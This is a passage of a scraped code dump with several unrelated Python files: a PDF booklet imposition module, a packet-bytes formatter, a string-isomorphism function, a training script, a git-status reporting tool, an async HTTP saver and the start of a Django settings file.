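    page.add_transformation(pypdf.Transformation().translate(tx=100 * i, ty=0))
    sheet.merge_page(page)

with open("imposed.pdf", "wb") as f:
    out.write(f)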
0, 0),\n ]\n\n color_row1 = cyan + magenta\n color_row2 = yellow + black\n pagesize = self.manu_paper_format\n (\n vertical,\n case,\n origin,\n origin_s,\n length,\n ) = self.___get_color_marker_position_and_length(\n pagesize, padding_ratio=0.15\n )\n\n row, column = case.split(\"x\")\n\n row = int(row)\n column = int(column)\n color_map = (\n [color_row1, color_row2] if row == 2 else [color_row1 + color_row2]\n )\n\n if not vertical:\n column, row = row, column\n color_map = List12dim.transpose(color_map)\n\n for i in range(0, row):\n for j in range(0, column):\n square_coordinate = (origin[0] + length * i, origin[1] + length * j)\n color = color_map[i][j]\n c, m, y, k = color\n canvas.saveState()\n canvas.setLineWidth(0)\n canvas.setFillColorCMYK(c, m, y, k)\n canvas.setStrokeColorCMYK(0, 0, 0, 0)\n canvas.rect(\n square_coordinate[0],\n square_coordinate[1],\n length,\n length,\n stroke=1,\n fill=1,\n )\n canvas.restoreState()\n origin_s\n for k in range(0, len(color_sequence)):\n i, j = (0 if vertical else k, k if vertical else 0)\n square_coordinate = (origin_s[0] + i * length, origin_s[1] + j * length)\n color = color_sequence[k]\n c, m, y, k = color\n canvas.saveState()\n canvas.setLineWidth(0)\n canvas.setFillColorCMYK(c, m, y, k)\n canvas.setStrokeColorCMYK(0, 0, 0, 0)\n canvas.rect(\n square_coordinate[0],\n square_coordinate[1],\n length,\n length,\n stroke=1,\n fill=1,\n )\n canvas.restoreState()\n\n return True\n return False\n\n def ___get_crop_line_positions(\n self, pagesize: Tuple[float, float]\n ) -> list[\n Tuple[float, float, float, float],\n Tuple[float, float, float, float],\n Tuple[float, float, float, float],\n Tuple[float, float, float, float],\n ]:\n trim_l = self.margin * 0.5\n x, y = self.____basic_position(pagesize)\n return [\n (x[0], y[0], x[0] + trim_l, y[0]), # h, u l\n (x[0], y[1], x[0] + trim_l, y[1]), # h, d l\n (x[1], y[0], x[1] + trim_l, y[0]), # h, u r\n (x[1], y[1], x[1] + trim_l, y[1]), # h, d r\n (x[2], y[3], x[2], y[3] + trim_l), # v, u l\n (x[2], y[2], x[2], y[2] + trim_l), # v, d l\n (x[3], y[3], x[3], y[3] + trim_l), # v, u r\n (x[3], y[2], x[3], y[2] + trim_l), # v, d r\n ]\n\n def ___get_registeration_positions(\n self, l: float, center: float, pagesize: Tuple[float, float]\n ) -> list[\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n ]:\n x, y = self.____basic_position(pagesize)\n trim_l = self.margin / 2\n return [\n (center - l / 2, y[0] - center - l),\n (center - l / 2, y[1] + center),\n (x[1] + trim_l / 2 - l / 2, y[0] - center - l),\n (x[1] + trim_l / 2 - l / 2, y[1] + center),\n (x[2] + center, y[3] + trim_l / 2 - l / 2),\n (x[2] + center, center - l / 2),\n (x[3] - center - l, y[3] + trim_l / 2 - l / 2),\n (x[3] - center - l, center - l / 2),\n ]\n\n def ___get_color_marker_position_and_length(\n self, pagesize: Tuple[float, float], padding_ratio: float\n ) -> Tuple[list, Literal[\"2x10\", \"1x20\"], list, list, float]:\n\n # Calculate side and head size and choose bigger one.\n pa = padding_ratio * self.margin\n hor = pagesize[0] - 2 * self.reg_l - self.margin\n ver = pagesize[1] - 2 * self.reg_l - self.margin\n\n if 2 * pa > hor or 2 * pa > ver:\n pa_t = padding_ratio * min(hor, ver)\n else:\n pa_t = pa\n vertical = True\n\n if ver < hor:\n vertical = False\n space_size = (hor - 2 * pa_t, self.margin - 2 * pa)\n origin = [self.margin * 1.5 + self.reg_l + pa_t, 0]\n\n else:\n space_size = 
(self.margin - 2 * pa, ver - 2 * pa_t)\n            origin = [0, self.margin * 1.5 + self.reg_l + pa_t]\n\n        # Fit a 2x10 and a 1x20 grid into the empty space, compute the square size\n        # (min(width, height)) each grid allows, and keep the larger one\n        # 2x10 case\n        if vertical:\n            dim2 = space_size[0] * 0.5\n            dim10 = space_size[1] * 0.1\n        else:\n            dim2 = space_size[1] * 0.5\n            dim10 = space_size[0] * 0.1\n        dim2_10 = min(dim2, dim10)\n        # 1x20 case\n        if vertical:\n            dim1 = space_size[0]\n            dim20 = space_size[1] * 0.05\n        else:\n            dim1 = space_size[1]\n            dim20 = space_size[0] * 0.05\n        dim1_20 = min(dim1, dim20)\n\n        square_length = max(dim2_10, dim1_20)\n        case = \"2x10\" if dim2_10 > dim1_20 else \"1x20\"\n\n        padding = self.margin / 2 - (\n            square_length if case == \"2x10\" else square_length / 2\n        )\n        if ver < hor:\n            origin[1] = padding\n        else:\n            origin[0] = padding\n\n        # origin_mixed = (self.margin+hor+2*self.reg_l+pa, self.margin+pa) if vertical else (self.margin +pa, self.margin+ ver + 2*self.margin+ pa)\n        origin_mixed = copy(origin)\n        if ver < hor:\n            origin_mixed[1] = self.margin * 1.5 + pagesize[1] - square_length * 0.5\n        else:\n            origin_mixed[0] = self.margin * 1.5 + pagesize[0] - square_length * 0.5\n\n        return vertical, case, origin, origin_mixed, square_length\n\n    def ___draw_registration_mark(\n        self, canvas: Canvas, x: float, y: float, l: float\n    ) -> NoReturn:\n        def get_abpath4(x0, y0, x1, y1):\n            return (x + x0, y + y0, x + x1, y + y1)\n\n        def get_abpath2(x0, y0):\n            return x + x0, y + y0\n\n        line_t = l / 15  # /25\n        line_l = l * (3 / 16)\n        circle_r1 = l * (5 / 16) - line_t\n        circle_r2 = circle_r1 - line_t * (1.5)\n\n        lines = [\n            get_abpath4(0, l / 2, line_l, l / 2),\n            get_abpath4(l - line_l, l / 2, l, l / 2),\n            get_abpath4(l / 2, 0, l / 2, line_l),\n            get_abpath4(l / 2, l - line_l, l / 2, l),\n        ]\n        canvas.setLineWidth(line_t)\n        canvas.setStrokeColor(registration_black)\n        canvas.setFillColor(registration_black)\n        # Draw cross line\n        canvas.lines(lines)\n        # Outer circle parts\n        arcs_outer = canvas.beginPath()\n        c = l / 2 - line_t / 2\n        a = c - circle_r1\n        b = c + circle_r1\n        x1, y1 = get_abpath2(\n            a, a\n        )  # the same relative coordinates give different absolute values in a different basis\n        x2, y2 = get_abpath2(b, b)\n        arcs_outer.arc(x1, y1, x2, y2, startAng=180, extent=90)\n        arcs_outer.arc(x1 + line_t, y1, x2 + line_t, y2, startAng=270, extent=90)\n        arcs_outer.arc(\n            x1 + line_t, y1 + line_t, x2 + line_t, y2 + line_t, startAng=0, extent=90\n        )\n        arcs_outer.arc(x1, y1 + line_t, x2, y2 + line_t, startAng=90, extent=90)\n        canvas.drawPath(arcs_outer, fill=0, stroke=1)\n\n        # inner circle parts\n        arcs_inner = canvas.beginPath()\n        a = c - circle_r2\n        b = c + circle_r2\n        x1, y1 = get_abpath2(a, a)\n        x2, y2 = get_abpath2(b, b)\n        xc, yc = get_abpath2(l / 2, l / 2)\n        d = line_t / 2\n        arcs_inner.moveTo(xc - d, yc - d)\n        arcs_inner.arcTo(x1, y1, x2, y2, startAng=180, extent=90)\n        arcs_inner.moveTo(xc + d, yc - d)\n        arcs_inner.arcTo(x1 + line_t, y1, x2 + line_t, y2, startAng=270, extent=90)\n        arcs_inner.moveTo(xc + d, yc + d)\n        arcs_inner.arcTo(\n            x1 + line_t, y1 + line_t, x2 + line_t, y2 + line_t, startAng=0, extent=90\n        )\n        arcs_inner.moveTo(xc - d, yc + d)\n        arcs_inner.arcTo(x1, y1 + line_t, x2, y2 + line_t, startAng=90, extent=90)\n\n        canvas.drawPath(arcs_inner, fill=1, stroke=0)\n\n    def generate_template(\n        self, manuscript: Manuscript\n    ) -> Tuple[pypdf.PdfFileReader, BytesIO]:\n        self.manu_paper_format = manuscript.file_paper_format\n        paper_format = self.__get_paper_dim(self.manu_paper_format)\n\n        tem_byte = io.BytesIO()\n        printing_template = 
Canvas(tem_byte, pagesize=paper_format)\n\n        if self.crop:\n            self.__draw_crop_lines(printing_template)\n        if self.reg:\n            self.__draw_registration(printing_template)\n        if self.cmyk:\n            self.__draw_color_marker(printing_template)\n        printing_template.showPage()\n        printing_template.save()\n\n        tem_byte.seek(0)\n        template_pdf = pypdf.PdfFileReader(tem_byte)\n\n        return template_pdf, tem_byte\n\n    def do(\n        self, index: int, manuscript: Manuscript, file_mode: str = \"safe\"\n    ) -> NoReturn:\n\n        if not self.on:\n            pass\n        else:\n            new_pdf, new_file = self.get_new_pdf(index, manuscript.tem_directory.name, file_mode)\n            template_pdf, tem_byte = self.generate_template(manuscript)\n            template = template_pdf.pages[0]\n            for i, page in enumerate(manuscript.pages):\n                temp_page = copy(template)\n                page.add_transformation(\n                    pypdf.Transformation().translate(tx=self.margin, ty=self.margin)\n                )\n                right = float(page.mediaBox[2])\n                top = float(page.mediaBox[3])\n                page.mediaBox.setUpperRight((right + self.margin, top + self.margin))\n\n                temp_page.merge_page(page)\n                new_pdf.add_page(temp_page)\n\n            new_pdf.write(new_file)\n\n            manuscript.pdf_update(new_pdf, new_file)\n\n\n# Work in progress\nclass Note(Template):\n    __name__ = \"note\"\n    __description__ = \"Expand and add note characters to manuscript\"\n\n    @property\n    def name(self):\n        return Note.__name__\n\n    @property\n    def description(self):\n        return Note.__description__\n\n    def __init__(\n        self,\n        numbering: bool = True,\n        targets: Literal[\"Both\", \"Odd\", \"Even\", \"Odd(only)\", \"Even(only)\"] = \"Both\",\n        location: Literal[\"H\", \"F\", \"HF\", \"FH\"] = \"H\",\n        align: Literal[\n            \"L\", \"R\", \"C\", \"LR\", \"CC\", \"RL\", \"LL\", \"LC\", \"RR\", \"RC\", \"CL\", \"CR\"\n        ] = \"LR\",\n        margin: float = 8.0,\n        font: str = \"Helvetica\",\n        fontsize: int = 12.0,\n    ):\n\n        self.numbering = numbering if isinstance(numbering, bool) else True\n        self.targets = targets\n        self.location = (\n            (location[0], location[1]) if len(location) != 1 else (location, location)\n        )\n        self.align = (align[0], align[1]) if len(align) != 1 else (align, align)\n\n        pass\n\n    def rule(\n        self, i: int\n    ) -> list:  # i = template page, list = manuscript pages unordered\n        _i = i * self.pages_per_template\n        _f = (i + 1) * self.pages_per_template\n        return list(range(_i, _f))\n\n    def generate_template(\n        self, manuscript: Manuscript\n    ) -> Tuple[pypdf.PdfFileReader, BytesIO]:\n        self.manu_paper_format = manuscript.file_paper_format\n        # TODO: build the note template; template_pdf and tem_byte are not defined yet\n        return template_pdf, tem_byte\n\n    def do(\n        self, index: int, manuscript: Manuscript, file_mode: str = \"safe\"\n    ) -> NoReturn:\n        if not self.on:\n            pass\n        else:\n            new_pdf, new_file = self.get_new_pdf(index, manuscript.tem_directory.name, file_mode)\n\n            # Expand pages\n\n            template_pdf, tem_byte = self.generate_template(manuscript)\n            for i, page in enumerate(template_pdf.pages):\n                pass\n\n            new_pdf.write(new_file)\n            manuscript.pdf_update(new_pdf, new_file)\n        pass\n\n\nif __name__ == \"__main__\":\n    pass\n","repo_name":"HornPenguin/Booklet","sub_path":"booklet/deprecated/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":22780,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"}
{"seq_id":"10253078958","text":"from pointInfoReplyContent import PointInfoReplyContent;\nfrom IDataFormatter import IDataFormatter;\nfrom ByteCombinator import ByteCombinator;\nfrom emptycontent import EmptyContent;\n\n\nPOINT_REPLY_EXPECTED_CONTENT_LENGTH = 42;\n\nclass PointReplyContentFormatter(IDataFormatter):\n    \"\"\"Class to format content 
bytes attached to a packet id equal to point info reply (149)\"\"\"\n\n    def format(self, replyBytes):\n        Body = EmptyContent();\n        #helper that combines two 8-bit bytes into a single 16-bit value\n        byteCombinator = ByteCombinator();\n\n        if(len(replyBytes) > 1):\n            if(len(replyBytes) == POINT_REPLY_EXPECTED_CONTENT_LENGTH):\n                replyDict = {\n                    'replyStatus' : replyBytes[0],\n                    'flags' : replyBytes[1],\n                    'node' : replyBytes[2],\n                    'channel' : replyBytes[3],\n                    'channelAddress' : replyBytes[4],\n                    'pointCategory' : replyBytes[5],\n                    'pointNumber' : replyBytes[6],\n                    'logicalPointNumber' : replyBytes[7],\n                    'logicalPointZone' : replyBytes[8],\n                    'deviceType' : replyBytes[9],\n                    'auxiliaryPointAttr' : replyBytes[10],\n                    'group' : byteCombinator.combineBytes(replyBytes[11],replyBytes[12]),\n                    'areaType' : replyBytes[13],\n                    'areaNumber' : replyBytes[14],\n                    'sectorID' : replyBytes[15],\n                    'loopType' : replyBytes[16],\n                    'rawIdentity' : replyBytes[17],\n                    'actualDeviceType' : replyBytes[18],\n                    'mode&Sensitivity' : replyBytes[19],\n                    'rawAnalogueValue1' : replyBytes[20],\n                    'rawAnalogueValue2' : replyBytes[21],\n                    'rawAnalogueValue3' : replyBytes[22],\n                    'LTAFlags' : replyBytes[23],\n                    'rawLTA' : replyBytes[24],\n                    '%Dirtiness' : replyBytes[25],\n                    'unitofMeasure1' : replyBytes[26],\n                    'unitofMeasure2' : replyBytes[27],\n                    'unitofMeasure3' : replyBytes[28],\n                    'convertedValue1' : replyBytes[29],\n                    'convertedValue2' : replyBytes[30],\n                    'convertedValue3' : replyBytes[31],\n                    'instantaneousActiveState' : replyBytes[32],\n                    'instantaneousFaultState' : replyBytes[33],\n                    'confirmedActiveState' : replyBytes[34],\n                    'confirmedFaultState' : replyBytes[35],\n                    'acknowledgedActiveState' : replyBytes[36],\n                    'outputForcedMode' : replyBytes[37],\n                    'outputUnforcedState' : replyBytes[38],\n                    'outputForcedState' : replyBytes[39],\n                    'clientID' : byteCombinator.combineBytes(replyBytes[40] ,replyBytes[41]),\n                    \n                };\n                #two byte pairs were combined above, so the formatted content holds 40 fields\n                Body = PointInfoReplyContent(**replyDict);\n            else:\n                raise TypeError(\"@PointInformationPacket: Invalid packet length\");\n        else:\n            raise ValueError(\"@PointReplyContentFormatter: Point Info Reply formatter requires more than one byte\");\n        if(Body is not None):\n            return Body;\n\n#For testing purposes, replyBytes contains only the content of a packet; it does not include SOH, FLG, SIZE, CHECKSUM or HEADER\nif(__name__ == '__main__'):\n\n    #A length of 42 emulates a valid packet length; all 10 test cases so far share this content length\n    #any length other than 42 is, for the time being, rejected as invalid content\n\n    replyBytes = [0] * POINT_REPLY_EXPECTED_CONTENT_LENGTH;\n    for index in range(1, len(replyBytes)):\n        replyBytes[index] = index;\n\n    body = PointReplyContentFormatter().format(replyBytes);\n\n    print(body.getByteArray());","repo_name":"dsikar/bash-scripts","sub_path":"packetizer/PointReplyContentFormatter.py","file_name":"PointReplyContentFormatter.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"73953932009","text":"\n\n# Time O(n); space O(1), since the mapping holds at most 26 letters\ndef isIsomorphicString(stringOne, stringTwo):\n    return isomorphic(stringOne) == isomorphic(stringTwo)\n\n\ndef isomorphic(string):\n    letterDict = dict()\n    ans = str()\n    nextChar = 'a'\n    for char in string:\n        if char not in letterDict:\n            letterDict[char] = nextChar\n\n            nextChar = chr(ord(nextChar) + 1)\n        \n        ans += 
letterDict[char]\n\n    \n    return ans\n\n\nprint(isIsomorphicString('foo', 'bar'))","repo_name":"ArshErgon/Leetcode-Question-Solution","sub_path":"LeetCode/easy/isIsomorphicString.py","file_name":"isIsomorphicString.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"34839019838","text":"import argparse\r\nimport os\r\nimport yaml\r\nimport json\r\n\r\nimport pytorch_lightning as pl\r\n\r\nfrom pytorch_lightning.loggers import CSVLogger\r\nfrom pytorch_lightning.utilities.seed import seed_everything\r\nfrom pytorch_lightning.plugins import DDPPlugin\r\nfrom utils.general_utils import *\r\n\r\n\r\nfrom datasets import DInterface\r\nfrom models import MInterface\r\n\r\n\r\ndef main(args):\r\n    seed_everything(args.seed, workers=True)\r\n\r\n    exp_name = args.config.split(\"/\")[-1].replace(\".yaml\", \"\").upper()\r\n\r\n    split_file = args.split_file\r\n    with open(split_file, \"r\") as f:\r\n        split_data = json.load(f)\r\n    logger = CSVLogger(save_dir=\"results\", name=\"\", version=exp_name)\r\n    args.save_dir = logger.log_dir\r\n\r\n    for split in split_data:\r\n        data_module = DInterface(args, split)\r\n        if args.resume:\r\n            model = MInterface.load_from_checkpoint(\r\n                checkpoint_path=args.resume, args=args, strict=False\r\n            )\r\n        else:\r\n            model = MInterface(args)\r\n\r\n        trainer = pl.Trainer(\r\n            gpus=-1,\r\n            max_epochs=args.max_epochs,\r\n            checkpoint_callback=False,\r\n            check_val_every_n_epoch=args.val_freq,\r\n            logger=logger,\r\n            accelerator=\"ddp_spawn\",\r\n            plugins=DDPPlugin(find_unused_parameters=False),\r\n            num_sanity_val_steps=args.num_sanity_val_steps,\r\n            deterministic=True,\r\n        )\r\n        trainer.fit(model, data_module)\r\n\r\n    old = os.path.join(\"results\", exp_name, \"metrics.csv\")\r\n    new = old.replace(\"metrics\", \"metrics_final\")\r\n    rename(old, new)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n    parser = argparse.ArgumentParser()\r\n    parser.add_argument(\"--config\", default=\"\")\r\n    args = parser.parse_args()\r\n    with open(args.config) as f:\r\n        config = yaml.load(f, Loader=yaml.FullLoader)\r\n    for k, v in config.items():\r\n        setattr(args, k, v)\r\n    main(args)\r\n","repo_name":"HopLee6/SSPVS-PyTorch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"}
{"seq_id":"12605604895","text":"import pathlib\nimport sys\nimport subprocess\nimport rich.console\nimport rich.table\n\n\nclass CommandLine(object):\n    # directory to search\n    dir = pathlib.Path(__file__).parent\n    # search depth\n    search_level = 2\n\n\ndef print_help():\n    print(f'''search the given directory, down to the given depth, for projects under version control and list their status\n\n{sys.argv[0]}\n    search the current directory with depth 2\n\n{sys.argv[0]} search_path\n    search the search_path directory with depth 2\n\n{sys.argv[0]} search_path search_level\n    search the search_path directory with depth search_level''')\n    pass\n\n\ndef print_version():\n    print(\"v 1.0.0\")\n\n\ndef init_command_line():\n    if len(sys.argv) == 2:\n        if sys.argv[1] == \"--help\" or sys.argv[1] == \"-h\":\n            print_help()\n            return False\n        elif sys.argv[1] == \"--version\" or sys.argv[1] == \"-v\":\n            print_version()\n            return False\n        else:\n            CommandLine.dir = pathlib.Path(sys.argv[1])\n    elif len(sys.argv) == 3:\n        CommandLine.dir = pathlib.Path(sys.argv[1])\n        try:\n            CommandLine.search_level = int(sys.argv[2])\n        except ValueError:\n            print_help()\n            return False\n    path = pathlib.Path(CommandLine.dir)\n    if not path.is_dir() and not path.is_file():\n        print_help()\n        return False\n    if 
path.is_file():\n        path = path.parent\n    CommandLine.dir = path.resolve()\n    return True\n\n\nclass ProjectInfo(object):\n    def __init__(self):\n        # project name\n        self.project = \"\"\n        # repository type, git or svn\n        self.cvs_type = \"\"\n        # branch name\n        self.branch_name = \"\"\n        # possible values:\n        # done: all changes committed and pushed to the server\n        # modified: changed but not yet committed\n        # committed: committed but not yet pushed\n        self.status = \"\"\n        # number of modified files\n        self.modified_count = 0\n        # number of untracked files\n        self.untracked_count = 0\n        # number of deleted files\n        self.deleted_count = 0\n        # number of new files\n        self.new_count = 0\n\n\nclass PathInfo(object):\n    def __init__(self, path, cvs_type):\n        self.path = path\n        self.cvs_type = cvs_type\n\n\nclass Branch(object):\n    def process(self, path: str) -> ProjectInfo:\n        pass\n\n    @staticmethod\n    def run_command(cmd: str, path: str):\n        p = subprocess.Popen(cmd, cwd=path, stdout=subprocess.PIPE)\n        return p.stdout.readlines()\n    pass\n\n\nclass GitBranch(Branch):\n    def process(self, path: str) -> ProjectInfo:\n        project_info = ProjectInfo()\n        project_info.project = pathlib.Path(path).name\n        project_info.cvs_type = \"git\"\n        out_list = self.run_command(\"git status\", path)\n        untracked_files_start = False\n        for out in out_list:\n            line = out.decode(\"utf8\").strip(\"*\").strip(\"\\n\").strip(\"\\r\")\n            if line == \"\":\n                continue\n            if line[0].isspace():\n                line = line.strip()\n                if line.startswith(\"(\"):\n                    if line.find(\"git push\") > 0 and line.find(\"publish your local commits\") > 0:\n                        project_info.status = \"committed\"\n                    continue\n                if untracked_files_start:\n                    project_info.untracked_count += 1\n                elif line.startswith(\"modified:\"):\n                    project_info.modified_count += 1\n                elif line.startswith(\"deleted:\"):\n                    project_info.deleted_count += 1\n                elif line.startswith(\"new file:\"):\n                    project_info.new_count += 1\n            else:\n                untracked_files_start = False\n                if line.startswith(\"(\"):\n                    continue\n                elif line.startswith(\"On branch\"):\n                    project_info.branch_name = line.split()[-1]\n                elif line.startswith(\"nothing to commit\"):\n                    if project_info.status == \"\":\n                        project_info.status = \"done\"\n                elif line.startswith(\"Untracked files:\"):\n                    untracked_files_start = True\n        if project_info.status != \"committed\" and project_info.status != \"done\":\n            project_info.status = \"modified\"\n        return project_info\n    pass\n\n\nclass BranchManager(object):\n    def __init__(self):\n        self.supported_cvs_type = {\n            \".git\": \"git\",\n            \".svn\": \"svn\"\n        }\n        self.create_branch_helper = {\n            \"git\": lambda: GitBranch()\n        }\n        self.modified_color = \"red\"\n        self.current_level = 0\n        pass\n\n    def work(self):\n        path_list = self.__collect_path()\n        project_info_list = []\n        for item in path_list:\n            if item.cvs_type not in self.create_branch_helper:\n                continue\n            branch = self.create_branch_helper[item.cvs_type]()\n            project_info = branch.process(item.path)\n            project_info_list.append(project_info)\n        self.__print_project_info(project_info_list)\n        pass\n\n    def __collect_path(self):\n        path_list = []\n        self.current_level = 1\n        self.__do_collect_path(pathlib.Path(CommandLine.dir), path_list)\n        return path_list\n        pass\n\n    def __do_collect_path(self, path: pathlib.Path, path_list: list):\n        if self.current_level > CommandLine.search_level:\n            return\n        for p in path.glob(\"*\"):\n            if p.is_file():\n                continue\n            if p.name in self.supported_cvs_type.keys():\n                cvs_type = self.supported_cvs_type[p.name]\n                path_list.append(PathInfo(path, cvs_type))\n            else:\n                self.current_level += 1\n                self.__do_collect_path(path.joinpath(p), path_list)\n                self.current_level -= 1\n        pass\n\n    def __print_project_info(self, project_info_list):\n        console = 
rich.console.Console()\n console.print(\"branch info\")\n table = rich.table.Table(show_header=True, header_style=\"bold magenta\")\n table.add_column(\"project\")\n table.add_column(\"branch\")\n table.add_column(\"status\")\n for project_info in project_info_list:\n if project_info.status == \"done\":\n table.add_row(project_info.project, project_info.branch_name, project_info.status)\n else:\n table.add_row(f\"[{self.modified_color}]{project_info.project}[/{self.modified_color}]\",\n f\"[{self.modified_color}]{project_info.branch_name}[/{self.modified_color}]\",\n f\"[{self.modified_color}]{project_info.status}[/{self.modified_color}]\")\n console.print(table)\n\n console.print(\"modified info\")\n table = rich.table.Table(show_header=True, header_style=\"bold magenta\")\n table.add_column(\"project\")\n table.add_column(\"modified\")\n table.add_column(\"untracked\")\n table.add_column(\"deleted\")\n table.add_column(\"new\")\n for project_info in project_info_list:\n table.add_row(project_info.project,\n str(project_info.modified_count), str(project_info.untracked_count),\n str(project_info.deleted_count), str(project_info.new_count))\n console.print(table)\n pass\n\n\ndef main():\n if not init_command_line():\n return\n mgr = BranchManager()\n mgr.work()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"xstar2091/pytools","sub_path":"src/branch.py","file_name":"branch.py","file_ext":"py","file_size_in_byte":7542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1788722205","text":"# Async CPU workload\nimport asyncio\nimport aiohttp\n\nfrom ch8_asyncronous_io.batched_results import do_task\n\n\ndef save_result_aiohttp(client_session):\n sem = asyncio.Semaphore(100)\n\n async def saver(result):\n nonlocal sem, client_session\n url = f\"http://127.0.0.1:8080/add\"\n async with sem:\n async with client_session.post(url, data=result) as response:\n return await response.json()\n return saver\n\n\nasync def calculate_task_aiohttp(num_iter, task_difficulty):\n tasks = []\n async with aiohttp.ClientSession() as client_session:\n saver = save_result_aiohttp(client_session)\n for i in range(num_iter):\n result = do_task(i, task_difficulty)\n task = asyncio.create_task(saver(result))\n tasks.append(task)\n await asyncio.sleep(0)\n await asyncio.wait(tasks)\n","repo_name":"AlexandruScrob/high_performance","sub_path":"ch8_asyncronous_io/async_cpu_workload.py","file_name":"async_cpu_workload.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16413601217","text":"import os\nfrom urllib.parse import urlparse\n\nimport environ\nimport sentry_sdk\nfrom sentry_sdk.integrations.django import DjangoIntegration\n\nenv = environ.Env(\n # set casting, default value\n DEBUG=(bool, False)\n)\n\nPROJECT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nBASE_DIR = os.path.dirname(PROJECT_DIR)\n\nSIMPEL_PAGE_MODEL = \"simpel_pages.Page\"\nSIMPEL_PAGE_SITE_MODEL = \"simpel_pages.RootPage\"\n\nSITE_ID = 1\n\nSITE_NAME = env(\"SITE_NAME\", str, default=\"example\")\n\nBASE_URL = env(\"BASE_URL\", str, default=\"http://127.0.0.1:8000\")\n\nPAGE_CACHE_TIMEOUT = env(\"PAGE_CACHE_TIMEOUT\", int, default=0)\n\nINSTALLED_APPS = [\n \"haystack\",\n \"apps.auth\",\n \"simpel_pages\",\n \"simpel_themes\",\n \"simpel_settings\",\n \"mptt\",\n \"filer\",\n \"tinymce\",\n \"django_rq\",\n \"polymorphic\",\n \"easy_thumbnails\",\n 
\"django.contrib.admin\",\n \"django.contrib.admindocs\",\n \"django.contrib.sites\",\n \"django.contrib.sitemaps\",\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.messages\",\n \"django.contrib.staticfiles\",\n]\n\nMIDDLEWARE = [\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n \"django.middleware.security.SecurityMiddleware\",\n \"django.middleware.locale.LocaleMiddleware\",\n]\n\n\nROOT_URLCONF = \"server.urls\"\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": [\n os.path.join(PROJECT_DIR, \"templates\"),\n ],\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n \"apps.auth.contexts.settings_export\",\n ],\n },\n },\n]\n\n\nWSGI_APPLICATION = \"server.wsgi.application\"\n\nCOMMENTS_APP = \"django_comments_xtd\"\nCOMMENTS_XTD_MODEL = \"simpel_discuss.models.Threat\"\nCOMMENTS_XTD_FORM_CLASS = \"simpel_discuss.forms.ThreatForm\"\n# To help obfuscating comments before they are sent for confirmation.\nCOMMENTS_XTD_SALT = b\"Timendi causa est nescire. \" b\"Aequam memento rebus in arduis servare mentem.\"\n\n# Source mail address used for notifications.\nCOMMENTS_XTD_FROM_EMAIL = \"webmaster@example.com\"\nCOMMENTS_XTD_MAX_THREAD_LEVEL = 1 # default is 0\nCOMMENTS_XTD_LIST_ORDER = (\"-thread_id\", \"order\") # default is ('thread_id', 'order')\n\n# Contact mail address to show in messages.\nCOMMENTS_XTD_CONTACT_EMAIL = \"helpdesk@example.com\"\n\nCOMMENTS_XTD_APP_MODEL_OPTIONS = {\n \"default\": {\n \"allow_flagging\": True,\n \"allow_feedback\": True,\n \"show_feedback\": True,\n \"who_can_post\": \"users\", # Valid values: 'all', users'\n }\n}\n\n# ------------------------------------------------------------------------------\n# DATABASE\n# https://docs.djangoproject.com/en/3.2/ref/settings/#databases\n# ------------------------------------------------------------------------------\nDEFAULT_AUTO_FIELD = \"django.db.models.BigAutoField\"\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n \"NAME\": os.path.join(BASE_DIR, \"db.sqlite3\"),\n }\n}\n\n\n# ------------------------------------------------------------------------------\n# PASSWORD VALIDATION\n# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators\n# ------------------------------------------------------------------------------\n\nAUTH_USER_MODEL = \"authentication.User\"\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n \"NAME\": \"django.contrib.auth.password_validation.UserAttributeSimilarityValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.MinimumLengthValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.CommonPasswordValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.NumericPasswordValidator\",\n },\n]\n\n\n######################################################\n# SESSION & CACHE\n######################################################\n\nREDIS_URL = env(\"REDIS_URL\", str, 
